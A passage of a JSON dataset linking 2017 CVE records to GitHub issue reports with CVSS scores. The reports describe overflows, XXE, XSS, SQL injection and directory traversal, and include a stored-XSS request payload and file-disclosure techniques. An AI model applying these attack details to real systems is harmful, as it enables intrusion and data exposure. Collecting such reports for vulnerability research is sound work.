PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG ) SUMMARY: APITAG stack overflow ( PATHTAG NUMBERTAG ABORTING",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-1000187",
        "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/36",
        "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/36",
        "Repo_new": "matthiaskramm/swftools",
        "Issue_Created_At": "2017-06-12T02:34:21Z",
        "description": "pdf2swf Invalid Address Access. Crash : URLTAG url Trigger : ./pdf2swf z i w b l f G I o /den/null swftools/pdf2swf_ z_ i_ w_ b_ l_ f_ G_ I_ APITAG Crash Detail : PATHTAG ./pdf2swf z i w b l f G I o /den/null swftools/pdf2swf_ z_ i_ w_ b_ l_ f_ G_ I_ APITAG ASAN:DEADLYSIGNAL APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG c (pc NUMBERTAG bc NUMBERTAG bp NUMBERTAG sp NUMBERTAG ffda NUMBERTAG c NUMBERTAG T NUMBERTAG bc NUMBERTAG PATHTAG NUMBERTAG e NUMBERTAG f6 ( PATHTAG NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG d2e2e ( PATHTAG NUMBERTAG b4ad0 ( PATHTAG NUMBERTAG da ( PATHTAG NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG f3 ( PATHTAG NUMBERTAG fca ( PATHTAG NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG d6f7 ( PATHTAG NUMBERTAG ae NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG f ( PATHTAG NUMBERTAG f2c NUMBERTAG PATHTAG NUMBERTAG fd NUMBERTAG f ( PATHTAG NUMBERTAG cef8 ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV ( PATHTAG NUMBERTAG ABORTING",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-1000190",
        "Issue_Url_old": "https://github.com/ngallagher/simplexml/issues/18",
        "Issue_Url_new": "https://github.com/ngallagher/simplexml/issues/18",
        "Repo_new": "ngallagher/simplexml",
        "Issue_Created_At": "2016-10-25T16:16:25Z",
        "description": "XXE vulnerability in APITAG Hi, there. Recently, I learned about APITAG and tried my luck to find some bugs. Here is what I found. As you know, APITAG can serialize and deserialize XML document. So I tested for these functions and finally I found these can lead to an XXE vulnerability. First, I tried to inject payloads into the attributes. However, APITAG cannot resolve external entity in attribute of the element. CODETAG It will raise an exception when resolve the XML document above because APITAG cannot resolve external entity in attributes. However, external entity can be used at elements' text nodes: CODETAG When deserialize this document above, we can retrieve the content of win.ini in C disk. Also, we can use http, gopher, dict protocol in XXE attack. More details in APITAG version is NUMBERTAG Besides, Retrofit is also affected by this vulnerability because of the usage of APITAG inside. FILETAG FILETAG To fix it, you can limit the resolving of external entities in XML document. Let me know if you have problem to reproduce this issue. Thanks!",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-1000191",
        "Issue_Url_old": "https://github.com/NICMx/Jool/issues/232",
        "Issue_Url_new": "https://github.com/nicmx/jool/issues/232",
        "Repo_new": "nicmx/jool",
        "Issue_Created_At": "2016-11-10T12:22:58Z",
        "description": "Kernel crash with Jool NUMBERTAG One of our SIIT DC BRs just crashed. It's an NUMBERTAG server running Ubuntu NUMBERTAG and kernel NUMBERTAG generic. This could be the hardware going faulty for all I know (it's the first time this has happened), but I'm including the oops from the serial console below. It mentions various Jool related functions, so I'm assuming you'd be interested in taking a look. ERRORTAG `",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-1000199",
        "Issue_Url_old": "https://github.com/open-iscsi/tcmu-runner/issues/194",
        "Issue_Url_new": "https://github.com/open-iscsi/tcmu-runner/issues/194",
        "Repo_new": "open-iscsi/tcmu-runner",
        "Issue_Created_At": "2017-07-14T15:48:00Z",
        "description": "Security information leak in internal qcow handler's check_config callback. The implementation of qcow_check_config presents an information leak, because it allows any user with access to the dbus system bus to check for the existance of files and directories, even if the user shouldn't have access to those files. For example issuing this command as a regular user allows to get the knowledge, whether APITAG exists: dbus send system print reply APITAG PATHTAG APITAG PATHTAG These kind of information leaks in combination with other security issues often leverage more serious security issues. I'd have suggested a bugfix for this but it is difficult to get right. If we knew the peer credentials from dbus we could do a comparison of those credentials against the target file credentials. This still would be difficult for corner cases, where the file itself would be accessible to the user, but not some of the upper components of the path. The check_config callback does currently not provide a possibility to pass peer credential information in, so this would affect public API in some way. Also I've not found a simple way to get the dbus peer credentials via libgio, maybe by using a APITAG All quite complicated, might be easier to drop this config callback altogether.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-1000212",
        "Issue_Url_old": "https://github.com/tonini/alchemist-server/issues/14",
        "Issue_Url_new": "https://github.com/tonini/alchemist-server/issues/14",
        "Repo_new": "tonini/alchemist-server",
        "Issue_Created_At": "2017-02-21T22:40:55Z",
        "description": "Server executes arbitrary code from remote machines. alchemist server starts a server that executes arbitrary code from any host that you reach you on the network, without any kind of authentication. APITAG Take note of the port, because the exploit below doesn't brute force the port (though this could easily be done by an attacker). CODETAG This also works from a remote machine because alchemist server listens on all interfaces, not just localhost. Listening on localhost by default would be a good idea, but is insufficient, because it still leaves the user open to attacks from other (less trusted) users on the machine, and possibly from the user's web browser via a DNS rebinding attack. Requiring a secret cookie before accepting any requests would be a good idea (beware, though, the secret needs a constant time comparison). Even better would be to use a UNIX socket.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-1000218",
        "Issue_Url_old": "https://github.com/hfiref0x/LightFTP/issues/5",
        "Issue_Url_new": "https://github.com/hfiref0x/lightftp/issues/5",
        "Repo_new": "hfiref0x/lightftp",
        "Issue_Created_At": "2017-07-06T11:37:42Z",
        "description": "Security buffer overflow. Hello, I've noticed a buffer overflow in the Unix version of APITAG This append in the \"writelogentry\" function. With this payload : APITAG With this configuration : CODETAG POC : CODETAG This buffer overflow can lead to remote code execution or a denial of service. I hope this will help you to fix the vuln.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-1000246",
        "Issue_Url_old": "https://github.com/rohe/pysaml2/issues/417",
        "Issue_Url_new": "https://github.com/identitypython/pysaml2/issues/417",
        "Repo_new": "identitypython/pysaml2",
        "Issue_Created_At": "2017-05-24T15:21:53Z",
        "description": "Reuse of AES initialization vector in APITAG / APITAG / Server. The Server URLTAG class randomly generates a fixed NUMBERTAG byte initialization vector (IV) for the purpose of encrypting data. Then, via the APITAG URLTAG class, that fixed IV makes its way to the APITAG class, where it is consistently reused for encrypting data. Initialization vector reuse like this is a security concern, since it leaks information about the encrypted data to attackers, regardless of the encryption mode used. For example, if the IV is reused with the same key in AES CTR mode, the attacker will very likely be able to entirely decrypt the encrypted data: URLTAG Instead of relying on a fixed, randomly generated IV, it would be better to randomly generate a new IV for every encryption operation. Here are a couple of links that have more information on why that is the preferred approach: FILETAG URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-1000418",
        "Issue_Url_old": "https://github.com/Mindwerks/wildmidi/issues/178",
        "Issue_Url_new": "https://github.com/mindwerks/wildmidi/issues/178",
        "Repo_new": "mindwerks/wildmidi",
        "Issue_Created_At": "2017-08-04T00:11:17Z",
        "description": "heap buffer overflow in APITAG Hi. I found a heap buffer overflow in wildmidi. Please confirm. Thanks. Summary: heap buffer overflow Browser/OS: Ubuntu NUMBERTAG bit Steps to reproduce: APITAG the .POC files. APITAG the source code with APITAG or Run wildmidi as valgrind. APITAG the following command : ./wildmidi APITAG o /dev/null APITAG download : APITAG URLTAG ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-1000420",
        "Issue_Url_old": "https://github.com/syncthing/syncthing/issues/4286",
        "Issue_Url_new": "https://github.com/syncthing/syncthing/issues/4286",
        "Repo_new": "syncthing/syncthing",
        "Issue_Created_At": "2017-08-07T05:56:43Z",
        "description": "Placeholder issue. To be replaced with real content tomorrow.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-1000421",
        "Issue_Url_old": "https://github.com/kohler/gifsicle/issues/114",
        "Issue_Url_new": "https://github.com/kohler/gifsicle/issues/114",
        "Repo_new": "kohler/gifsicle",
        "Issue_Created_At": "2017-08-09T18:11:53Z",
        "description": "Use After Free bug in gifview (tested with the latest version NUMBERTAG When viewing a gif figure: APITAG gfi = APITAG // URLTAG > A new object gfi is allocated APITAG APITAG gfi)); // URLTAG > gfi is added into gfs >images (assuming with inde NUMBERTAG gfi >refcount increases by NUMBERTAG APITAG read_image(grr, &gfc, gfi, read_flags); // URLTAG > Try to read the image > Assuming this call fails and return NUMBERTAG due to a corrupted figure) APITAG APITAG gfs >nimages NUMBERTAG URLTAG > APITAG >images[gfs >nimages NUMBERTAG APITAG >images[gfs >nimages NUMBERTAG i.e., APITAG > gfi is freed APITAG goto done // URLTAG APITAG NUMBERTAG gfi is used multiple times after being freed. // URLTAG APITAG gfi is freed again. // URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-1000426",
        "Issue_Url_old": "https://github.com/mapproxy/mapproxy/issues/322",
        "Issue_Url_new": "https://github.com/mapproxy/mapproxy/issues/322",
        "Repo_new": "mapproxy/mapproxy",
        "Issue_Created_At": "2017-08-14T10:50:55Z",
        "description": "Update demo service. TODO",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-1000428",
        "Issue_Url_old": "https://github.com/flatCore/flatCore-CMS/issues/35",
        "Issue_Url_new": "https://github.com/flatcore/flatcore-cms/issues/35",
        "Repo_new": "flatcore/flatcore-cms",
        "Issue_Created_At": "2017-08-12T14:48:20Z",
        "description": "Multiple XSS (reflected and stored). Hey, I found NUMBERTAG SS in your application NUMBERTAG Reflected XSS in FILETAG / FILETAG Your FILETAG is vulnerable to reflected xss URLTAG This is because you use $_SERVER FILETAG This is verified with the github version as well as with Version NUMBERTAG Stored XSS in logfile Version NUMBERTAG from your website is also vulnerable to stored xss by the following request: GET FILETAG HTTP NUMBERTAG Host: APITAG User Agent: APITAG alert NUMBERTAG APITAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en US,en;q NUMBERTAG Connection: close Upgrade Insecure Requests NUMBERTAG This is triggered when the administrator opens the log view. FILETAG Cheers",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-1000433",
        "Issue_Url_old": "https://github.com/rohe/pysaml2/issues/451",
        "Issue_Url_new": "https://github.com/identitypython/pysaml2/issues/451",
        "Repo_new": "identitypython/pysaml2",
        "Issue_Created_At": "2017-09-09T09:04:08Z",
        "description": "Running python with optimizations makes APITAG accept any password for any user. On the current master branch, the APITAG class relies on an assert statement to check the user's password: URLTAG The assert is supposed to raise an exception if the password doesn't match. This is insecure: running python with optimizations enabled (either via the APITAG or APITAG flags, or with the PYTHONOPTIMIZE environment variable URLTAG will remove all such assertions URLTAG . This means that no exception will be raised on an incorrect password, and the APITAG will accept any password for any user. It would be better to have an explicit check that raises an exception to avoid this problem.",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2017-1000437",
        "Issue_Url_old": "https://github.com/marcobambini/gravity/issues/186",
        "Issue_Url_new": "https://github.com/marcobambini/gravity/issues/186",
        "Repo_new": "marcobambini/gravity",
        "Issue_Created_At": "2017-09-04T23:24:15Z",
        "description": "Buffer Overflow (operator_string_add) . Summary: Gravity is vulnerable to a Stack Buffer Overflow in the operator_string_add function. ASAN is saying it is a \"buffer underflow\" but by looking at gravity under GDB we can see that we are gaining a arbitrary write. This opens up a security risk as a attacker can use this to write passed a static buffer and achieve code execution. Execution: ./gravity APITAG GDB: FILETAG ASAN: ERRORTAG POC: CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-1000443",
        "Issue_Url_old": "https://github.com/Eleix/openhacker/issues/5",
        "Issue_Url_new": "https://github.com/booth-f/openhacker/issues/5",
        "Repo_new": "booth-f/openhacker",
        "Issue_Created_At": "2017-09-19T17:26:42Z",
        "description": "XSS, SQL Injection and logic problem in APITAG APITAG Not sanitized, used in a query later, used in a message later. SQL Injection & XSS. $details .= $_POST['details']; XSS, used in the message later. Logic problem: To deduce the amount the hacker is sending to another hacker, the amount is being multiplied by NUMBERTAG so if he's sending NUMBERTAG the game treats it as if its NUMBERTAG What happens if the original amount I sent is NUMBERTAG and it gets multiplied by NUMBERTAG It turns into a positive integer NUMBERTAG and I gain free cash.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-1000444",
        "Issue_Url_old": "https://github.com/Eleix/openhacker/issues/4",
        "Issue_Url_new": "https://github.com/booth-f/openhacker/issues/4",
        "Repo_new": "booth-f/openhacker",
        "Issue_Created_At": "2017-09-19T17:08:48Z",
        "description": "SQL Injection in APITAG As lgin.htm tries to grab the user's IP, it prioritizes HTTP_X_FORWARDED_FOR before REMOTE_ADDR. REMOTE_ADDR can be trusted not to be manipulated by the user however HTTP_X_FORWARDED_FOR is very easily manipulated. It needs validation of being a valid IP address. Look into APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-1000445",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/775",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/775",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-09-22T12:48:49Z",
        "description": "Null Pointer Dereference at APITAG of APITAG Hi all, APITAG NUMBERTAG still exist in latest development branch APITAG might return NULL if APITAG fails, then it will cause Null Pointer Deference. similar suspicious code pieces might also have the same issue: URLTAG URLTAG URLTAG ERRORTAG Regards, Alex, APITAG Inc.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-1000448",
        "Issue_Url_old": "https://github.com/structured-data/linter/issues/41",
        "Issue_Url_new": "https://github.com/structured-data/linter/issues/41",
        "Repo_new": "structured-data/linter",
        "Issue_Created_At": "2017-09-25T09:29:03Z",
        "description": "The URL input doesn't check the user inputs. Hi, When I used your online tool to check the RDFa attributes of my own website, I got the following error: error ERRORTAG Failed to open APITAG No such file or directory @ rb_sysopen APITAG The problem here is that I didn't precise APITAG . Consequently, the software tried to find APITAG as a local file. This issue leads to a directory traversal attack, allowing an attacker to disclose information about the remote system. For example, it is possible to know if a directory exists or not (with APITAG as input): error Errno::EISDIR: Is a directory @ io_fread PATHTAG When used on a file which the format is not recognised by the parser, the error message tends to leak some precious information (with APITAG as input): validation PATHTAG Errors found during processing validation PATHTAG ERROR [line NUMBERTAG Lexer error: With input APITAG APITAG LTS, Trusty Tahr\" ID=ubuntu ID_LIKE=debian APITAG NUMBERTAG Invalid token \"NAME= Ubuntu \": {:production=>:statement, :token=>\"NAME= Ubuntu \"}: validation PATHTAG FATAL recovery: statement: [\".\"] For example, an attacker could use this vulnerability to reveal the installed and running services on the remote host (with APITAG as input): validation PATHTAG Errors found during processing validation PATHTAG ERROR [line NUMBERTAG Lexer error: With input 'client] port NUMBERTAG socket = PATHTAG Here is entries for some specific progr': Invalid token \"client]\": APITAG :token=>\"client]\"}: validation PATHTAG FATAL recovery: APITAG \";\" validation PATHTAG FATAL recovery: APITAG \"]\" validation PATHTAG FATAL recovery: triples: [\".\"] validation PATHTAG FATAL recovery: statement: [\".\"] We know now that the APITAG server is installed on the remote server and listens on port NUMBERTAG To check if it is currently running or not (with APITAG as input): error ERRORTAG Failed to open PATHTAG No such file or directory @ rb_sysopen PATHTAG To fix this issue, the user inputs need to be checked to ensure that they are real URL addresses and not local files.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-1000450",
        "Issue_Url_old": "https://github.com/opencv/opencv/issues/9723",
        "Issue_Url_new": "https://github.com/opencv/opencv/issues/9723",
        "Repo_new": "opencv/opencv",
        "Issue_Created_At": "2017-09-26T22:19:03Z",
        "description": "Out of bounds write causes Segmentation Fault. System information (version) APITAG NUMBERTAG the latest commit NUMBERTAG d NUMBERTAG Operating System / Platform => Linux Compiler => gcc Detailed description An invalid writing occurs in the APITAG and APITAG functions in PATHTAG POC URLTAG Steps to reproduce ERRORTAG Crash Details ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-1000459",
        "Issue_Url_old": "https://github.com/leanote/leanote/issues/676",
        "Issue_Url_new": "https://github.com/leanote/leanote/issues/676",
        "Repo_new": "leanote/leanote",
        "Issue_Created_At": "2017-10-17T18:41:49Z",
